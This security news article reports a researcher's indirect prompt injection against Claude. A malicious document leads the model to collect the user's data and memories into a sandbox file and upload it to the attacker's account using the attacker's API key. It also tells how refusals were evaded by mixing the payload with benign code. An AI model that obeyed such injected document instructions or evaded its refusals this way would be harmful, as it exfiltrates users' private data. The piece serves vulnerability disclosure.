Attackers can use indirect prompt injections to trick Anthropic’s AI model Claude, into exfiltrating data that the user has access to, according to security researcher Johann Rehberger of Embrace The Red.
This attack exploits Claude’s Files APIs and is only possible if the AI model has network access. Network access is a feature enabled by default on certain plans and is intended to let Claude access external resources, such as code repositories or Anthropic APIs.
The Exfiltration Technique
The attack is relatively simple: an indirect prompt injection payload is used to read a user’s data and store it in a file within the Claude Code Interpreter’s sandbox. The malicious prompt then tricks the model into interacting with the Anthropic API using an API key provided by the attacker.
The code in the payload instructs Claude to upload the Code Interpreter file from the sandbox. However, because the attacker’s API key is utilized, the file is uploaded directly to the attacker’s account instead of the user's. Rehberger noted that this technique allows an adversary to exfiltrate up to 30MB at once, and attackers could upload multiple files.
After the initial successful attempt, Claude began to refuse payloads, especially those with the API key in plain text. To overcome this, Rehberger had to blend the prompt injection with benign code to convince Claude that the request was not malicious.
Attack Initiation and Impact
The attack starts when a user loads a malicious document, received from the attacker, into Claude for analysis. The exploit code hijacks the model, which then follows the attacker’s instructions to harvest the user’s data, save it to the sandbox, and call the Anthropic File API to transmit it.
The researcher confirmed that this attack can be used to exfiltrate the user’s chat conversations, which Claude saves using its newly introduced "memories" feature. The attacker can then view and access the exfiltrated file from their console.
Rehberger initially disclosed the attack to Anthropic via HackerOne, but the report was closed because the issue was categorized as a model safety concern, not a security vulnerability. However, after the researcher published information on the attack, Anthropic reversed course and notified Rehberger that the data exfiltration method is indeed in scope for security reporting.
Anthropic’s documentation does underline the risks associated with granting Claude network access and warns of potential attacks carried out via external files or websites that could lead to code execution and information leaks. The documentation also provides recommended mitigations against such attacks.
Found this article interesting? Follow us on X(Twitter) ,Threads and FaceBook to read more exclusive content we post.

